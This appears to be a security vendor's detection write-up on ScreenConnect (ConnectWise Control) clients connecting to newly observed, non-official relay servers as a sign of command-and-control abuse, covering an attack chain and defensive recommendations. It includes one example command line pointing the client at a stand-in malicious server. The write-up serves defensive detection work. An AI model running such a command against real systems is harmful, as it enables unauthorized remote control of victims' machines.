Newly Observed ScreenConnect Host Server
Detection of ScreenConnect clients connecting to a newly observed host server outside the official ScreenConnect cloud, potentially indicating command and control activity or compromise.
This detection identifies instances where a ScreenConnect client (ConnectWise Control) connects to a ScreenConnect host server that has not been previously observed and is not part of the official ScreenConnect cloud infrastructure. ScreenConnect, a legitimate remote management and access tool, is often abused by threat actors for command and control (C2) and establishing persistence on compromised systems. The presence of self-hosted or non-standard relay servers can indicate malicious activity. This detection rule aggregates connections by the server host (parsed from the client command line), focusing on first-time observations within a defined time window and limiting the scope to a single host to minimize false positives.
Attack Chain
- Initial Access: The attacker gains initial access to a target system through various methods (e.g., phishing, exploitation of vulnerabilities).
- Tool Deployment: The attacker deploys or leverages an existing ScreenConnect client on the compromised system.
- Configuration Modification: The attacker configures the ScreenConnect client to connect to a malicious or attacker-controlled ScreenConnect server. This involves modifying the client's command-line arguments to specify the non-standard host server (e.g.,
ScreenConnect.ClientService.exe e=Access&y=Guest&h=malicious.server.com&p). - Connection Establishment: The ScreenConnect client initiates a connection to the attacker-controlled server, bypassing legitimate ScreenConnect infrastructure.
- Command and Control: The attacker establishes a remote connection to the compromised system through the ScreenConnect client, gaining remote control.
- Lateral Movement/Privilege Escalation: The attacker uses the remote access provided by ScreenConnect to perform lateral movement within the network, escalating privileges as necessary.
- Data Exfiltration/Malware Deployment: The attacker uses the established connection to exfiltrate sensitive data from the compromised system or deploy additional malware for further exploitation.
- Persistence: The attacker leverages ScreenConnect to maintain persistent access to the compromised system, ensuring continued control even after system restarts or other events.
Impact
A successful attack can lead to unauthorized remote access to systems, data exfiltration, malware deployment, and potentially complete system compromise. The use of ScreenConnect allows attackers to bypass traditional security measures and maintain persistent control over affected systems. The impact can range from data breaches and financial losses to reputational damage and disruption of business operations. The severity depends on the attacker's objectives and the sensitivity of the compromised data.
Recommendation
- Deploy the Sigma rule
Detect Newly Observed ScreenConnect Host Serverto your SIEM to identify suspicious ScreenConnect connections (rules). - Enable process creation logging with command-line auditing to capture ScreenConnect client executions and associated parameters (logsource).
- Investigate any alerts generated by the Sigma rule, focusing on the
Esql.screenconnect_serverfield to determine the destination host and validate its legitimacy (rules). - Monitor network connections originating from systems running the ScreenConnect client, looking for connections to unusual or untrusted destinations (logsource).
- Implement application control policies to restrict the execution of unauthorized or modified ScreenConnect clients (references).
Detection coverage 2
Detect Newly Observed ScreenConnect Host Server
highDetects ScreenConnect clients connecting to a newly observed host server, indicating potential C2 activity.
Detect ConnectWise Signed ScreenConnect Connecting to Unknown Host
highDetects signed ConnectWise ScreenConnect clients connecting to a newly observed host server, indicating potential C2 activity.
Detection queries are available on the platform. Get full rules →